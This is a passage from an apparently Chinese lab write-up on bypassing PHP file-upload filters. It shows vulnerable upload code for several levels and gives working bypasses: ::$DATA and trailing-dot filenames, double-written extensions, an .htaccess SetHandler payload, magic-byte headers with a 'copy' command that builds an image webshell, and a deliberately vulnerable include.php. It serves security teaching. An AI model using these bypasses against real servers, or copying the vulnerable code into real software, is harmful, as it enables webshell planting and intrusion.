class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); <span 
class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>以上代码中没有对<code>::$DATA</code>进行处理——也就是缺少了下面这一行(后续关卡中补上了它),用于从扩展名中剔除<code>::$DATA</code>:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br></pre></td></tr></table></figure>
<p>这里我们把上传请求抓包,在文件名最后添加<code>::$DATA</code>即可绕过,如<code>test.php::$DATA</code>。此时 strrchr 取到的<code>$file_ext</code>带有<code>::$DATA</code>后缀,与黑名单中的<code>.php</code>不相等而通过校验;落盘路径由时间戳、随机数和这个扩展名拼接而成,NTFS 把<code>::$DATA</code>解释为默认数据流,最终磁盘上得到的就是一个<code>.php</code>文件。</p>
<h5 id="路径拼接绕过"><a href="#路径拼接绕过" class="headerlink" title="路径拼接绕过"></a>路径拼接绕过</h5><p>在代码中,会对文件名进行处理(删除末尾的点、去除<code>::$DATA</code>、首尾去空等),并据此提取扩展名做黑名单校验;但最终拼接保存路径时用的却是只经过 deldot 的<code>$file_name</code>,而不是校验过的扩展名。校验对象与实际写入的名字不一致,这是本关的根本缺陷</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span 
class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); <span 
class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>这里我们构造文件名<code>test.php. .</code>(点+空格+点)。处理流程:deldot 删去末尾的点,得到<code>test.php. </code>;strrchr 取到的“扩展名”是<code>. </code>,trim 之后变成<code>.</code>,不在黑名单中,于是通过校验。随后文件以<code>test.php. </code>(末尾带点和空格)为名保存,而 Windows 会丢弃文件名末尾的空格和点,最终磁盘上得到<code>test.php</code>。与<code>::$DATA</code>一样,该技巧依赖 Windows 的文件名规范化,在 Linux 上无效。</p>
<h5 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h5><p>代码不再拒绝不合规的上传,而是用 str_ireplace 把文件名中出现的黑名单关键字(不区分大小写)直接删除,然后原样保存</p>
<p>例如<code>test.php</code>会变成<code>test.</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">"php"</span>,<span class="string">"php5"</span>,<span class="string">"php4"</span>,<span class="string">"php3"</span>,<span class="string">"php2"</span>,<span class="string">"html"</span>,<span class="string">"htm"</span>,<span class="string">"phtml"</span>,<span class="string">"pht"</span>,<span class="string">"jsp"</span>,<span class="string">"jspa"</span>,<span class="string">"jspx"</span>,<span class="string">"jsw"</span>,<span class="string">"jsv"</span>,<span class="string">"jspf"</span>,<span class="string">"jtml"</span>,<span class="string">"asp"</span>,<span class="string">"aspx"</span>,<span class="string">"asa"</span>,<span class="string">"asax"</span>,<span 
class="string">"ascx"</span>,<span class="string">"ashx"</span>,<span class="string">"asmx"</span>,<span class="string">"cer"</span>,<span class="string">"swf"</span>,<span class="string">"htaccess"</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = str_ireplace(<span class="variable">$deny_ext</span>,<span class="string">""</span>, <span class="variable">$file_name</span>);</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$file_name</span>; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>我们这里构造文件名为<code>test.pphphp</code>,str_ireplace 删除中间的<code>php</code>后剩下的恰好是<code>test.php</code>。能够绕过的原因是 str_ireplace 只做一次性、非递归的替换:删除一处匹配后不会回头重新扫描结果字符串,所以把关键字拆开嵌套即可重新拼出来。这类“删除黑名单关键字”的过滤天然不可靠;正确做法是对扩展名做白名单校验并由服务端生成文件名,而不是循环替换直到字符串不再变化。</p>
<h5 id="上传-htaccess"><a href="#上传-htaccess" class="headerlink" title="上传.htaccess"></a>上传.htaccess</h5><p>.htaccess 文件是 Apache 服务器的目录级配置文件,负责所在目录及其子目录的配置。通过 .htaccess 可以实现:301 重定向、自定义 404 页面、改变文件扩展名的解析方式、允许/阻止特定用户或目录的访问、禁止目录列表、配置默认文档等功能。IIS 平台上不存在该文件。需要注意的是,.htaccess 是否生效取决于 httpd.conf 中对应目录的 <code>AllowOverride</code> 指令(Apache 2.4 的默认值为 <code>AllowOverride None</code>,此时 .htaccess 会被完全忽略);本文的利用方式要求该目录的 <code>AllowOverride</code> 至少放开 <code>FileInfo</code>,并且 PHP 以 mod_php 方式运行,<code>SetHandler application/x-httpd-php</code> 才会让 Apache 把文件交给 PHP 解析</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">"php1"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span 
class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">"pHp1"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = trim(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$file_name</span> = deldot(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> <span class="variable">$file_ext</span> = strrchr(<span class="variable">$file_name</span>, <span class="string">'.'</span>);</span><br><span class="line"> <span class="variable">$file_ext</span> = strtolower(<span class="variable">$file_ext</span>); <span 
class="comment">//转换为小写</span></span><br><span class="line"> <span class="variable">$file_ext</span> = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> <span class="variable">$file_ext</span> = trim(<span class="variable">$file_ext</span>); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'此文件不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . 
<span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>服务器禁止了几乎所有脚本类型的后缀,但这一关的黑名单漏掉了<code>.htaccess</code>,因此可以上传 .htaccess 改变目录内文件的解析方式来绕过(前提见上:Apache + mod_php,且该目录允许 .htaccess 覆盖 FileInfo 配置)</p>
<p>上传.htaccess文件,.htaccess文件代码如下</p>
<p>下面的配置让服务器把名为 1.jpg 的文件当作 PHP 运行。注意 FilesMatch 的参数是正则表达式,<code>1.jpg</code> 中的 <code>.</code> 匹配任意单个字符,精确匹配应写成 <code>^1\.jpg$</code>;如果去掉 FilesMatch 包裹、只保留 <code>SetHandler application/x-httpd-php</code> 一行,则该目录下的所有文件都会被当作 PHP 解析</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><FilesMatch "1.jpg"> </span><br><span class="line">SetHandler application/x-httpd-php </span><br><span class="line"></FilesMatch></span><br></pre></td></tr></table></figure>
<p>先上传含有上述内容的 .htaccess 文件,再上传含有木马代码的 1.jpg 文件,之后访问 upload 目录下的 1.jpg 即由 PHP 解析,可以直接用工具连接</p>
<h3 id="检查内容"><a href="#检查内容" class="headerlink" title="检查内容"></a>检查内容</h3><h4 id="文件头检查"><a href="#文件头检查" class="headerlink" title="文件头检查"></a>文件头检查</h4><p>这里只读取文件的前两个字节来判断上传文件的类型(见下面的 <code>fread($file, 2)</code>),因此只要文件开头两个字节是合法图片的幻数即可通过。另外注意保存时的文件名由服务端用随机数加时间戳生成,扩展名取自识别出的图片类型,攻击者无法控制,所以单靠上传无法让文件被当作 PHP 执行,还需要配合下文的文件包含漏洞</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getReailFileType</span>(<span class="params"><span class="variable">$filename</span></span>)</span>{</span><br><span class="line"> <span class="variable">$file</span> = fopen(<span class="variable">$filename</span>, <span class="string">"rb"</span>);</span><br><span class="line"> <span class="variable">$bin</span> = fread(<span class="variable">$file</span>, <span class="number">2</span>); <span class="comment">//只读2字节</span></span><br><span class="line"> fclose(<span class="variable">$file</span>);</span><br><span 
class="line"> <span class="variable">$strInfo</span> = @unpack(<span class="string">"C2chars"</span>, <span class="variable">$bin</span>); </span><br><span class="line"> <span class="variable">$typeCode</span> = intval(<span class="variable">$strInfo</span>[<span class="string">'chars1'</span>].<span class="variable">$strInfo</span>[<span class="string">'chars2'</span>]); </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">''</span>; </span><br><span class="line"> <span class="keyword">switch</span>(<span class="variable">$typeCode</span>){ </span><br><span class="line"> <span class="keyword">case</span> <span class="number">255216</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'jpg'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">13780</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'png'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> <span class="number">7173</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'gif'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>: </span><br><span class="line"> <span class="variable">$fileType</span> = <span class="string">'unknown'</span>;</span><br><span class="line"> } </span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$fileType</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span 
class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$file_type</span> = getReailFileType(<span class="variable">$temp_file</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$file_type</span> == <span class="string">'unknown'</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_type</span>;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>主要是检测文件内容开始处的文件幻数,比如图片类型的文件幻数如下,</p>
<p>要绕过jpg文件幻数检测就要在文件开头写上下图的值:</p>
<p>Value = FF D8 FF E0 00 10 4A 46 49 46(JPEG/JFIF 文件头;对上面只读两字节的检查而言,只有开头的 <code>FF D8</code> 参与判断,其余字节属于 JFIF APP0 段)</p>
<p><img src="https://upload-images.jianshu.io/upload_images/15378294-c22107455ddd7217.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/639/format/webp" alt="JPEG 文件头十六进制示意图"></p>
<p>要绕过gif 文件幻数检测就要在文件开头写上下图的值</p>
<p>Value = 47 49 46 38 39 61(即 ASCII 字符串 <code>GIF89a</code>,可以直接以文本形式写在木马文件开头)</p>
<p><img src="https://upload-images.jianshu.io/upload_images/15378294-5b20d65ed7622052.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/607/format/webp" alt="GIF 文件头十六进制示意图"><br>要绕过png 文件幻数检测就要在文件开头写上下面的值</p>
<p>Value = 89 50 4E 47(PNG 签名的前 4 字节;完整签名为 89 50 4E 47 0D 0A 1A 0A,这里的检查只看前两字节 <code>89 50</code>)</p>
<p><img src="https://upload-images.jianshu.io/upload_images/15378294-d22290e70f64e241.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/589/format/webp" alt="PNG 文件头十六进制示意图"></p>
<p>然后在文件幻数后面加上自己的一句话木马代码就行了</p>
<p><strong>绕过方法</strong></p>
<p>准备一张普通的图片和一句话木马</p>
<p>在 Windows 命令行输入以下命令(<code>/b</code> 表示以二进制方式读取图片,<code>/a</code> 表示以文本方式追加木马;Linux 下可用 cat 将图片和木马按顺序拼接得到同样的效果)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy image.jpg/b+test.php/a test.png</span><br></pre></td></tr></table></figure>
<p>生成的test.png就是我们制作好的图片马,上传即可。注意它在服务器上仍然以图片扩展名保存,Web 服务器不会直接把它当作 PHP 执行,需要借助下面的文件包含漏洞</p>
<p>利用文件包含漏洞执行其中的 PHP 代码:<code>include</code> 不关心文件扩展名,会把被包含文件中 PHP 标记内的内容当作代码执行,前面的图片数据则作为普通输出</p>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=upload/xxx.jpg</span><br></pre></td></tr></table></figure>
<h4 id="突破getimagesize"><a href="#突破getimagesize" class="headerlink" title="突破getimagesize()"></a>突破getimagesize()</h4><p>通过<code>getimagesize()</code>函数识别文件类型,再由<code>image_type_to_extension()</code>得到扩展名。顺带指出下面代码的一个缺陷:<code>stripos($types,$ext)>=0</code> 在 PHP 中永远为真——找不到时 stripos 返回 <code>false</code>,而 <code>false >= 0</code> 成立,所以 <code>.jpeg|.png|.gif</code> 这个白名单实际上没有生效,任何 getimagesize 能识别的图片格式(如 bmp、webp)都会被放行;正确写法应当是 <code>!== false</code>。不过扩展名来自识别结果而非用户输入,该缺陷本身不会直接导致脚本文件上传。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">function isImage($filename){</span><br><span class="line"> $types = '.jpeg|.png|.gif';</span><br><span class="line"> if(file_exists($filename)){</span><br><span 